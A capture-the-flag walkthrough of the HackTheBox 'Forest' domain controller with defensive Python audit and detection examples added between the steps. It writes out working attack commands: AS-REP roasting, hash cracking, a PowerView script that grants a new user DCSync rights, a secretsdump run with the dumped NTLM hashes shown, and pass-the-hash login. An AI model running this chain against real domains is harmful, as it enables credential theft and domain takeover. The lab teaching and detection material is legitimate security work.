Forest

Let's start off with nmap:

nmap -sC -sV -oA nmap/ -T4 10.129.95.210

Results:

Nmap scan report for 10.129.95.210
Host is up (0.053s latency).
Not shown: 989 closed tcp ports (conn-refused)
PORT     STATE SERVICE      VERSION
53/tcp   open  domain       Simple DNS Plus
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2023-01-13 13:18:08Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h46m50s, deviation: 4h37m10s, median: 6m49s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2023-01-13T13:18:14
|_  start_date: 2023-01-13T13:14:57
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2023-01-13T05:18:15-08:00

Ports 53 and 88 (DNS and Kerberos) are open, which indicates that we are dealing with Active Directory, and more specifically a Domain Controller! We also get a domain name: htb.local.

Null sessions are not enabled on the target, but we can still do some enumeration over RPC using rpcclient (empty username, no password):

rpcclient -U "" -N 10.129.95.210

There is a lot of interesting info we can query via rpcclient:

enumdomusers

[image: enumdomusers output]

Users are all we need, but we could also use commands like

enumdomgroups

to get a list of all the groups and their RIDs,

querygroupmem <RID>

to list the users of a specific group, and

queryuser <RID>

to show more detailed info about a user!

The next step is to see what we can do with just usernames. One technique is AS-REP Roasting, which abuses a Kerberos setting: when pre-authentication is disabled for an account, anyone can request the AS-REP message for that user without proving knowledge of its password. The AS-REP contains a Ticket Granting Ticket (TGT) issued by the Key Distribution Center (KDC), which is used for future access requests by the user, and part of the reply is encrypted with a key derived from the user's password, so it can be cracked offline. A good article on this can be found here.

This can be exploited with Impacket's GetNPUsers.py script. Before running it, add the users found earlier to a users.txt file, then run:

GetNPUsers.py htb.local/ -dc-ip 10.129.95.210 -usersfile users.txt -format hashcat -outputfile hashes.txt 

[image: GetNPUsers.py output]

The output lists the users for which the method didn't work, but we get one hash in our hashes.txt file! The next step is to crack it with hashcat:

./hashcat.exe -m 18200 hashes.txt rockyou.txt

And we get user svc-alfresco password! Which is 's3rvice'.
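The AS-REP roast only succeeds because svc-alfresco has Kerberos pre-authentication switched off. As an added example (not part of the original writeup), here is the audit a defender would run to find every account in that state before an attacker does: it decodes the userAccountControl attribute from a constructed LDAP export, lists the enabled accounts with the DONT_REQ_PREAUTH bit set, and builds the LDAP filter that asks the directory the same question directly. The bit values and the matching-rule OID are the documented Active Directory ones; the account names and values are made up for this example.

```python
# Added example (not part of the original writeup): a defender's audit of which
# domain accounts are exposed to AS-REP roasting.
#
# AS-REP roasting only works against accounts whose userAccountControl has the
# DONT_REQ_PREAUTH bit set.  This decodes userAccountControl values from a
# constructed LDAP export and lists the enabled accounts carrying that bit,
# which is exactly the set GetNPUsers.py would get a hash for.  The fix is to
# clear the bit and rotate the account's password.

# userAccountControl bit values as documented for Active Directory.
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0010: "LOCKOUT",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x400000: "DONT_REQ_PREAUTH",
}
ACCOUNTDISABLE = 0x0002
DONT_REQ_PREAUTH = 0x400000
# OID of the LDAP bitwise-AND matching rule used in userAccountControl filters.
LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"

# Constructed sample export: the attribute names are real AD attributes, the
# accounts and their values are made up for this example.
SAMPLE_EXPORT = [
    {"sAMAccountName": "Administrator", "userAccountControl": 0x10200},
    {"sAMAccountName": "svc-alfresco", "userAccountControl": 0x410200},  # pre-auth off
    {"sAMAccountName": "old-svc", "userAccountControl": 0x400202},       # pre-auth off, but disabled
    {"sAMAccountName": "sebastien", "userAccountControl": 0x200},
]


def decode_uac(value):
    """Return the set of known flag names present in a userAccountControl integer."""
    return {name for bit, name in UAC_FLAGS.items() if value & bit}


def find_asrep_roastable(accounts):
    """Names of enabled accounts that do not require Kerberos pre-authentication."""
    hits = []
    for acct in accounts:
        uac = int(acct["userAccountControl"])
        if uac & DONT_REQ_PREAUTH and not uac & ACCOUNTDISABLE:
            hits.append(acct["sAMAccountName"])
    return hits


def asrep_ldap_filter():
    """LDAP filter that asks the directory for the same set directly."""
    return (
        "(&(objectCategory=person)"
        f"(userAccountControl:{LDAP_MATCHING_RULE_BIT_AND}:={DONT_REQ_PREAUTH})"
        f"(!(userAccountControl:{LDAP_MATCHING_RULE_BIT_AND}:={ACCOUNTDISABLE})))"
    )


if __name__ == "__main__":
    for name in find_asrep_roastable(SAMPLE_EXPORT):
        print(f"{name}: {sorted(decode_uac(0x410200))} -> remediate")
    print("LDAP filter:", asrep_ldap_filter())
```

Disabled accounts are skipped because the KDC refuses them anyway, so they produce no crackable AS-REP; the filter string can be handed to ldapsearch or to Get-ADUser -LDAPFilter to get the live list from a domain controller.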

Next step is to login to the box using evil-winrm:

evil-winrm -u svc-alfresco -p s3rvice -i 10.129.95.210

[image: Evil-WinRM session as svc-alfresco]

We're in! Next, let's enumerate the domain using BloodHound. With Evil-WinRM we can directly download and upload files in addition to executing PowerShell commands. Let's upload SharpHound.ps1 to the machine:

upload SharpHound.ps1

[image: SharpHound.ps1 upload]

After uploading the file, first import its functions by dot-sourcing it:

. ./SharpHound.ps1

Now we can call its functions in the Evil-WinRM/PowerShell session. Let's run the default gathering function with all collection methods:

Invoke-BloodHound -CollectionMethod All

This command generates a zip file in the folder you run it from. Let's download the file:

download 20230113103531_BloodHound.zip

Next, let's open BloodHound, import the zip file and start enumerating.

Our target is Domain Admin, so let's use one of BloodHound's built-in analysis queries:

[image: BloodHound initial path to Domain Admins]

The initial result gives a path that I didn't manage to execute, so let's remove it:

[image: BloodHound path after removing the unusable edge]

The great thing about BloodHound is that when it manages to give a correct path, it even tells us which tools we could try and which PowerShell commands to run! I'm not going to paste the BloodHound instructions, but you can check the steps in the images below:

[image: BloodHound path, part 1]

[image: BloodHound path, part 2]

Basically, our user svc-alfresco is a member of the Service Accounts group, which is a member of the Privileged IT Accounts group, which in turn is a member of the Account Operators group. Account Operators has full access to the Exchange Windows Permissions group, and that group has permission to modify the DACL (Discretionary Access Control List) on the domain object. So, what we need to do is add a user we control to Exchange Windows Permissions and then use that membership to add a DACL entry on the domain that grants the user DCSync rights.

To do this, first we need to download PowerView.ps1 and upload it to the machine using Evil-WinRM.

[image: PowerView.ps1 upload]

Next, create a file script.ps1 with contents:

# Load the PowerView functions
Import-Module .\powerview.ps1
# Create a new domain user that we control
net user zolaboo password /add /domain
# Put it in the group that can modify the domain object's DACL
net group "Exchange Windows Permissions" /add zolaboo
# Build a credential for the new user so PowerView acts with its fresh group membership
$SecPassword = ConvertTo-SecureString 'password' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('HTB\zolaboo', $SecPassword)
# Add an ACE on the domain object granting the user DCSync (replication) rights
Add-DomainObjectAcl -Credential $Cred -PrincipalIdentity 'zolaboo' -TargetIdentity 'DC=htb,DC=local' -Rights DCSync

This script loads the PowerView functions, creates a new domain user, adds it to the Exchange Windows Permissions group, and then, authenticating as that user, grants it DCSync rights on the domain object.
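The whole chain above rests on two conditions in the domain object's DACL: a group that can rewrite the DACL (Exchange Windows Permissions here) and, once the script has run, a plain user holding the replication extended rights. As an added example (not from the original writeup and not PowerView's code), this is the audit a defender would run over an export of the domain object's ACEs to catch both. The replication right GUIDs are the well-known Active Directory ones; the ACE records, the field names and the baseline of expected principals are constructed for this example and should be tuned to the forest being checked.

```python
# Added example (not from the original writeup and not PowerView's code): an
# audit of the domain object's DACL for the two things this attack chain needs.
#
#   1. principals that already hold the directory replication extended rights
#      (what "DCSync" means) and are not a group expected to have them, and
#   2. principals that can rewrite the DACL itself (WriteDacl, WriteOwner or
#      GenericAll), because they can grant themselves the rights in (1), which
#      is exactly what "Exchange Windows Permissions" can do here.
#
# The ACE records are constructed; the field names loosely follow what
# Get-DomainObjectAcl prints, but this is not PowerView's output format.

# Well-known extended-right GUIDs for directory replication.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_GUIDS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}

# Principals that legitimately replicate or administer the directory
# (assumed baseline for this example; tune it to your forest).
EXPECTED_PRINCIPALS = {
    "NT AUTHORITY\\ENTERPRISE DOMAIN CONTROLLERS",
    "HTB\\Domain Controllers",
    "HTB\\Domain Admins",
    "HTB\\Enterprise Admins",
    "BUILTIN\\Administrators",
}
# Rights that let a principal change who is allowed what on the object.
DACL_CONTROL_RIGHTS = {"WriteDacl", "WriteOwner", "GenericAll"}

# Constructed sample ACEs for the domain object DC=htb,DC=local.
SAMPLE_ACES = [
    {"trustee": "NT AUTHORITY\\ENTERPRISE DOMAIN CONTROLLERS", "rights": "ExtendedRight",
     "object_type": DS_REPLICATION_GET_CHANGES, "type": "Allow"},
    {"trustee": "HTB\\Domain Controllers", "rights": "ExtendedRight",
     "object_type": DS_REPLICATION_GET_CHANGES_ALL, "type": "Allow"},
    {"trustee": "BUILTIN\\Administrators", "rights": "ExtendedRight",
     "object_type": DS_REPLICATION_GET_CHANGES_ALL, "type": "Allow"},
    {"trustee": "HTB\\Exchange Windows Permissions", "rights": "WriteDacl",
     "object_type": None, "type": "Allow"},
    {"trustee": "HTB\\zolaboo", "rights": "ExtendedRight",
     "object_type": DS_REPLICATION_GET_CHANGES, "type": "Allow"},
    {"trustee": "HTB\\zolaboo", "rights": "ExtendedRight",
     "object_type": DS_REPLICATION_GET_CHANGES_ALL, "type": "Allow"},
    {"trustee": "Everyone", "rights": "GenericAll",
     "object_type": None, "type": "Deny"},  # a Deny ACE grants nothing
]


def replication_rights(aces):
    """Map each trustee to the set of replication GUIDs it is allowed."""
    rights = {}
    for ace in aces:
        if ace["type"] != "Allow":
            continue
        if ace["rights"] == "ExtendedRight" and ace["object_type"] in REPLICATION_GUIDS:
            rights.setdefault(ace["trustee"], set()).add(ace["object_type"])
        elif ace["rights"] == "GenericAll":  # GenericAll includes every extended right
            rights.setdefault(ace["trustee"], set()).update(REPLICATION_GUIDS)
    return rights


def find_unexpected_dcsync(aces):
    """Trustees outside the baseline holding replication rights, and whether they hold both."""
    findings = {}
    for trustee, guids in replication_rights(aces).items():
        if trustee in EXPECTED_PRINCIPALS:
            continue
        findings[trustee] = "full DCSync" if guids == REPLICATION_GUIDS else "partial"
    return findings


def find_dacl_writers(aces):
    """Trustees outside the baseline that can change the domain DACL and so grant themselves DCSync."""
    return sorted({
        ace["trustee"] for ace in aces
        if ace["type"] == "Allow"
        and ace["rights"] in DACL_CONTROL_RIGHTS
        and ace["trustee"] not in EXPECTED_PRINCIPALS
    })


if __name__ == "__main__":
    print("replication rights outside baseline:", find_unexpected_dcsync(SAMPLE_ACES))
    print("can rewrite the domain DACL:", find_dacl_writers(SAMPLE_ACES))
```

Run against the sample it reports zolaboo as a full DCSync holder and Exchange Windows Permissions as a DACL writer; the second finding is the one that exists before any attacker touches the domain, which is why it is the one worth fixing first.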

Upload it to the machine:

[image: script.ps1 upload]

Next, run the script with

./script.ps1

Now run secretsdump on your attack machine:

secretsdump.py zolaboo:password@10.129.95.210

And we get hashes!

joonas@joonas-VirtualBox:~/Documents/htb/forest$ secretsdump.py zolaboo:password@10.129.95.210
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
...
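The "Using the DRSUAPI method" line is the tell: secretsdump is asking the domain controller to replicate the directory to it, exactly as another DC would. As an added example (not part of the original writeup), here is the detection a defender would run for that step. With "Audit Directory Service Access" enabled, the DC logs Security event 4662 for each replication request, with Control Access (0x100) in AccessMask and the replication right GUIDs in Properties; the logic below flags such events when the subject is not a machine account. The event lines are constructed in a flat key=value form for the example, not the real EVTX/XML layout, and the GUIDs are the well-known replication extended rights.

```python
# Added example (not part of the original writeup): detection logic for the
# DCSync step, i.e. the DRSUAPI replication request secretsdump.py makes.
#
# With "Audit Directory Service Access" enabled, a domain controller logs
# Security event 4662 for the replication request: AccessMask 0x100 (Control
# Access) with the replication extended-right GUIDs in Properties.  Domain
# controllers replicate legitimately; a user account doing it is the signal.
# The log lines are constructed in a flat key=value form, not the real EVTX/XML
# layout; adapt parse_event() to whatever your SIEM exports.
import re

DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_GUIDS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}
CONTROL_ACCESS = 0x100
GUID_RE = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}", re.I)

# Constructed sample: a DC replicating (benign), the attacker's new user
# replicating (DCSync), an ordinary property read with a placeholder GUID,
# and an unrelated network logon.
SAMPLE_LOG = """\
EventID=4662;SubjectUserName=FOREST$;SubjectDomainName=HTB;AccessMask=0x100;Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}
EventID=4662;SubjectUserName=zolaboo;SubjectDomainName=HTB;AccessMask=0x100;Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}
EventID=4662;SubjectUserName=sebastien;SubjectDomainName=HTB;AccessMask=0x10;Properties={00000000-0000-0000-0000-000000000000}
EventID=4624;SubjectUserName=zolaboo;SubjectDomainName=HTB;LogonType=3
"""


def parse_event(line):
    """Split one constructed 'key=value;key=value' line into a dict."""
    return dict(field.split("=", 1) for field in line.strip().split(";") if field)


def is_dcsync(event):
    """True if the event is a directory replication request by a non-machine account."""
    if event.get("EventID") != "4662":
        return False
    if int(event.get("AccessMask", "0"), 16) & CONTROL_ACCESS == 0:
        return False
    guids = {g.lower() for g in GUID_RE.findall(event.get("Properties", ""))}
    if not guids & REPLICATION_GUIDS:
        return False
    # Machine accounts (name ending in $) are the DCs replicating among themselves.
    # Tighter: compare against the actual list of DC computer accounts, so that a
    # compromised member-server account replicating is not waved through.
    return not event.get("SubjectUserName", "").endswith("$")


def find_dcsync_subjects(log_text):
    """DOMAIN\\user for every suspicious replication event in the log."""
    subjects = []
    for line in log_text.splitlines():
        ev = parse_event(line)
        if is_dcsync(ev):
            subjects.append(f'{ev["SubjectDomainName"]}\\{ev["SubjectUserName"]}')
    return subjects


if __name__ == "__main__":
    for subject in find_dcsync_subjects(SAMPLE_LOG):
        print(f"possible DCSync by {subject}")
```

On the sample only HTB\zolaboo is reported: FOREST$ is the DC itself, sebastien's event is a plain property read, and the 4624 logon is not a directory access at all.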

With the Administrator NTLM hash we can log in to the machine as admin using Evil-WinRM's pass-the-hash option, which takes the NT half of the hash:

evil-winrm -u administrator -H 32693b11e6aa90eb43d32c72a07ceea6 -i 10.129.95.210

[image: Evil-WinRM session as Administrator]

To be continued